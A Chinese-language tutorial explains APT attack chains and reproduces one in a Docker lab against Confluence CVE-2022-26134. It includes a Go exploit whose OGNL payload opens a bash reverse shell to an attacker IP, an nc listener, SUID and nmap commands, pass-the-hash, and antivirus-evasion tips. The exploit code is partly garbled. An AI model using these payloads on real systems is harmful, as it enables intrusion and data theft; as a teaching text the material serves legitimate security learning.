0x01 起底APT攻击:从原理到战术

APT(高级持续性威胁)攻击是一种复杂且高度针对性的攻击形式,它通常由具备强大资源支持的攻击团队策划实施,目标是长期潜伏并窃取敏感数据或破坏关键系统。APT攻击的独特之处在于它的持久性与隐匿性:攻击者往往会花费数月甚至数年时间建立立足点,同时伪装成正常用户或流量,避开检测机制。

这一章节,我们将从技术角度分析APT攻击的关键组件,解构一个典型APT攻击链的完整流程:信息收集、初始入侵、权限提升、横向移动、数据窃取、痕迹清除。掌握这些环节中的技术原理,是理解APT攻击的基础。

---

攻击链的分解与技术原理

1. 信息收集:打造攻击的基础

APT攻击的第一步是信息收集,攻击者需要尽可能多地收集目标组织的外部暴露面信息,包括:域名、IP地址、员工邮箱、使用的技术栈等。典型技术包括:

  • OSINT(开源情报收集): 利用工具如Shodan、Censys枚举暴露服务。
  • 社交工程: 构造鱼叉式钓鱼邮件获取凭证。
  • 供应链渗透: 瞄准目标的第三方合作企业。

2. 初始入侵:进到门里的破坏者

一旦获得目标的外部暴露面信息,攻击者会选择合适的入口进行突破。这可能是通过鱼叉式钓鱼邮件携带恶意文档,或者利用公开的RCE(远程代码执行)漏洞。以CVE-2022-26134为例,这是一个影响Confluence的漏洞,可直接获取服务器权限。

3. 权限提升:从普通用户到管理员

大多数情况下,攻击者在初始入侵后只拥有普通用户权限。通过本地提权漏洞(如ms14-068、Dirty Pipe),攻击者可以快速提升为系统管理员权限。

4. 横向移动:扩展控制范围

横向移动的目的是从初始受害系统扩展到组织内部更多的主机或服务器。常用方法包括:

  • 利用被盗的域用户凭证访问其他服务器。
  • 扫描和攻击内部服务,如SMB、RDP或数据库。
  • 滴水法收集域管理员账户并控制域控。

5. 数据窃取:攻击的最终目标

攻击者可能的目标包括:

  • 数据库中的敏感信息。
  • 邮件服务器的数据。
  • 内部代码仓库中的源代码。

这些数据一般会通过加密通道(如HTTPS或自定义协议)传输到外部服务器。

6. 痕迹清除:消失得无声无息

在完成攻击目标后,攻击者会移除后门、删除日志或干扰日志记录,以掩盖自己的痕迹。

---

0x02 实战:重现APT攻击链

这一部分,我们将使用一个模拟环境,再现APT攻击链的核心环节。搭建环境后,我们将展示如何利用一个实际漏洞(比如CVE-2022-26134)进行突破,并扩展到完整的攻击。

---

环境搭建:创建一个靶场

黑客示意图

为了演示APT攻击链,我们需要搭建一个包含以下组件的测试环境:

  1. 靶机: 一个运行Confluence的Linux服务器,漏洞版本可选择7.13.0
  2. 攻击机: 一台搭载Kali Linux的攻击机,内置常用工具如nmap、Metasploit等。

我们可以使用Docker快速构建靶场,以下是靶机的Docker配置:

<pre><code class="language-sh"># 拉取并运行一个有漏洞版本的Confluence容器 docker run -d -p 8090:8090 --name confluence-atlassian \ vulnerablecontainers/confluence:7.13.0</code></pre>

此时,靶机的Confluence服务已通过http://<IP>:8090暴露。

---

初始入侵:利用CVE-2022-26134漏洞

CVE-2022-26134是一个OGNL表达式注入漏洞,允许攻击者通过构造恶意Payload在Confluence服务器上执行任意代码。我们将用一个简单的Go脚本实现攻击。

攻击代码:基于HTTP的RCE利用

以下是完整的Go代码,执行后可在目标服务器上生成一个反向Shell:

<pre><code class="language-go">package main

黑客示意图

import ( &quot;bytes&quot; &quot;fmt&quot; &quot;net/http&quot; )

func main() { // 漏洞目标URL target := &quot;http://&lt;靶机IP&gt;:8090&quot;

// 构造Payload,这里是一个简单的反向Shell payload := ${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec(&quot;bash -i &gt;&amp; /dev/tcp/&lt;攻击者IP&gt;/4444 0&gt;&amp;1&quot;).getInputStream(),&quot;UTF-8&quot;)).(#a)}

// 设置攻击请求的Header req, err := http.NewRequest(&quot;GET&quot;, target, nil) if err != nil { fmt.Println(&quot;Error creating request:&quot;, err) return } req.Header.Set(&quot;User-Agent&quot;, &quot;Mozilla/5.0&quot;) req.Header.Set(&quot;X-Exploit-Header&quot;, payload)

// 发起请求 client := &amp;http.Client{} resp, err := client.Do(req) if err != nil { fmt.Println(&quot;Error sending exploit:&quot;, err) return } defer resp.Body.Close()

黑客示意图

fmt.Println(&quot;Exploit sent! Check your listener.&quot;) }</code></pre>

启动监听器

在攻击机上,使用nc监听反向Shell连接: <pre><code class="language-sh">nc -lvnp 4444</code></pre>

运行上述Go代码,靶机的Shell会连接到攻击机。

---

权限提升:从普通用户到高权限

在获取反向Shell后,我们会发现当前用户为普通权限。可以尝试以下方式提权:

  1. SUID提权: 查找具有SUID权限的二进制文件。执行:

    2. `sh find / -perm -4000 2>/dev/null ` 如果发现/usr/bin/vi存在SUID权限,可以利用它提权。

  1. 利用内核漏洞提权: 搜索靶机上的内核版本,查找对应的提权漏洞,如Dirty Pipe(CVE-2022-0847)。

---

横向移动:扩展内网控制

  1. 凭证抓取: 在提权后,检查是否有存储的SSH私钥,或从/etc/passwd中获取其他用户信息。
  2. 内部扫描: 使用工具nmap扫描内网资产:

    3. `sh nmap -sP 10.0.0.0/24 `

  3. 传递哈希: 如果捕获了域用户的NTLM哈希,可以通过工具impacketwmiexec.py实现横向移动。

---

0x03 绕过与对抗:免杀与隐匿技巧

APT攻击的核心是隐匿性,以下是一些典型技术:

  1. 流量伪装: 将C2流量伪装成HTTPS或DNS查询。
  2. 免杀技术: 使用工具如Shellter对载荷进行加壳,绕过杀软检测。
  3. 内存加载: 使用reflective DLL injection技术,将恶意代码直接加载到内存中。

---

0x04 个人经验:从CTF到实战

APT攻击链虽然复杂,但各环节都有工具辅助完成。在CTF比赛中,常见的Web、提权、内网题目,正是APT攻击链的缩影。对于新手来说,建议从以下几个方向入手:

  • 学习漏洞原理和利用,如SQL注入、RCE、提权漏洞。
  • 熟练掌握常见工具,如nmapmsfconsole
  • 理解网络协议和日志分析,提升反侦察能力。

最后提醒一句:切勿在未经授权的情况下尝试上述技术,合法合规才是第一原则!